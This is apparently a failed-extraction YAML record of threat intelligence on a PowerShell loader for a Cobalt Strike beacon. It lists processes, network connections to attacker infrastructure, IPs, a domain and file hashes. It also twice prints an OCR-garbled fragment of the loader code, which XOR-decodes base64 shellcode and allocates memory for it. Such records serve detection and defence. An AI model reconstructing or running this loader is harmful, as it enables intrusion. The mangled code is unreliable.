# Failed YAML extraction
# Timestamp: 2026-05-01T20:27:16.075209
# Response length: 4741 chars
# Input chunk preview: 'y on a Chinese server with the following attributes:File Name: y1.ps1File Size: 4 KBHost IP: 123.207.215.76:80Host Attribution: Shenzhen Tencent Computer Systems Company Ltd. (China)Capture Time: 2025'
# ============================================================

title: "Analysis of PowerShell Loader with Cobalt Strike Beacon"
description: A PowerShell script was discovered that acts as a shellcode loader, using reflective DLL loading and API hashing to evade detection. It connects to a remote server for further payload delivery.
attribution: ""
malware_families:
  - Cobalt Strike
cves: []
ttps:
  processes:
    - powershell.exe
  command_lines:
    - Set-strictmode -Version 2
    - function func_get_proc_address {Paran ($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]: :CurrentDonain.GetAssenblies() | where-Object { $_.GlobalAssemblycache -And $_.Location.s|$Svar_gpa = $var_unsafe_native_methods.GetMethod(GetProcaddress, [Type[]] @("System.Runtime.InteropServices.HandleRef, string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](Neu|tfunction func_get_delegate_type {Paran ([Paraneter(Position = @, Mandatory = $True)] [Type[]] $var_paraneters,[Parameter(Position = 1)] [Type] $var_return_type = [Void])$var_type_builder = [AppDomain]: :CurrentDomain.DefineDynanicAssenbly( (New-Object System.Reflection.AssenblyNane(ReflectedDelegate$var_type_builder.DefineConstructor(RTspecialliame, HideBySig, Public, [Systen.Reflection.CallingConventions]: :Standard, $var_paral$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, Newslot, Virtual', $var_return_type, $var_parameters).SetInplementatiofreturn $var_type_builder.CreateType()tI ([IntPtr]::size -eq 8) {[Byte[]]$var_code = [System.Convert]::FromBase64String( ' 32ugx9PL6yMjI2]yYnhxcnVrEvFGashxQ2uocTtrgHEDa6hRC2s51G1pbhl gaxLjjx9CXyEPA2Lfor ($x = 0; $x -1t $var_code.Count; $x+) {$Svar_code[$x] = $var_code[$x] -bxor 35t$var_va = [Syste.Runtime. InteropServices.Harshal]: :GetDelegateForFunctionpointer( (func_get_proc_address kernel32.dll VirtualAlloc)Svar_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.length, 6x3008, 0x48)[System. Runtime. InteropServices.Harshal]: :Copy($var_code, @, $var_buFfer, $var_code.length)
  powershell:
    - Set-strictmode -Version 2
    - function func_get_proc_address {Paran ($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]: :CurrentDonain.GetAssenblies() | where-Object { $_.GlobalAssemblycache -And $_.Location.s|$Svar_gpa = $var_unsafe_native_methods.GetMethod(GetProcaddress, [Type[]] @("System.Runtime.InteropServices.HandleRef, string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](Neu|tfunction func_get_delegate_type {Paran ([Paraneter(Position = @, Mandatory = $True)] [Type[]] $var_paraneters,[Parameter(Position = 1)] [Type] $var_return_type = [Void])$var_type_builder = [AppDomain]: :CurrentDomain.DefineDynanicAssenbly( (New-Object System.Reflection.AssenblyNane(ReflectedDelegate$var_type_builder.DefineConstructor(RTspecialliame, HideBySig, Public, [Systen.Reflection.CallingConventions]: :Standard, $var_paral$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, Newslot, Virtual', $var_return_type, $var_parameters).SetInplementatiofreturn $var_type_builder.CreateType()tI ([IntPtr]::size -eq 8) {[Byte[]]$var_code = [System.Convert]::FromBase64String( ' 32ugx9PL6yMjI2]yYnhxcnVrEvFGashxQ2uocTtrgHEDa6hRC2s51G1pbhl gaxLjjx9CXyEPA2Lfor ($x = 0; $x -1t $var_code.Count; $x+) {$Svar_code[$x] = $var_code[$x] -bxor 35t$var_va = [Syste.Runtime. InteropServices.Harshal]: :GetDelegateForFunctionpointer( (func_get_proc_address kernel32.dll VirtualAlloc)Svar_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.length, 6x3008, 0x48)[System. Runtime. InteropServices.Harshal]: :Copy($var_code, @, $var_buFfer, $var_code.length)
  scripts: []
  registry_keys: []
  image_loads:
    - kernel32.dll
    - wininet.dll
  network_connections:
    - powershell.exe -> y2n273y10j.cfc-execute.bj.baidubce.com:443
    - powershell.exe -> 46.173.27.142:50050
  file_activity: []
  persistence: []
  process_relations: []
iocs:
  hashes:
    - cdd757e92092b9a72dec0a7529219dd790226b82c69925c90e5d832955351b52
    - 23a04d2ae94998b26c42c327f9344b784eb00d0a42c0ade353275bdedff9824f
    - 27f88c7005f33bfc67731cb732c7c72e0cea7f97db1f15bcf5880d3e7f7f85eb
    - 6954005ab1b1d2deec940181674000e394f860fe4f626d6b0abf63453d5fff48
    - ed2b7d55781414cdb3e0f64de6d9fea9bf282ee49e12b112f9e0748d5266fd60
    - 1f0f4415b738198cc82359212f3ead281b7eb38070163a7782584f77346e619f
    - eed87a02d126c3ac0ab90a66f4e4a58f24d6a0f4028a2643e83a3a8b075cb5ac
    - 69b1261eac205aefb6a5237ff3d87ef515e838184c1616ec935a4f7f4aa04ac1
    - 60652f62ec7772b611f3a62fd93d690e677b616e972a0444650f0a2ea597f77f
    - 1d4f814d06a3893545f51f1158d6677b1b083a90ab57ba03c58f8d26c29e5a10
  ip_addresses:
    - 123.207.215.76
    - 46.173.27.142
  domains:
    - y2n273y10j.cfc-execute.bj.baidubce.com
  urls: []
authors:
  - ""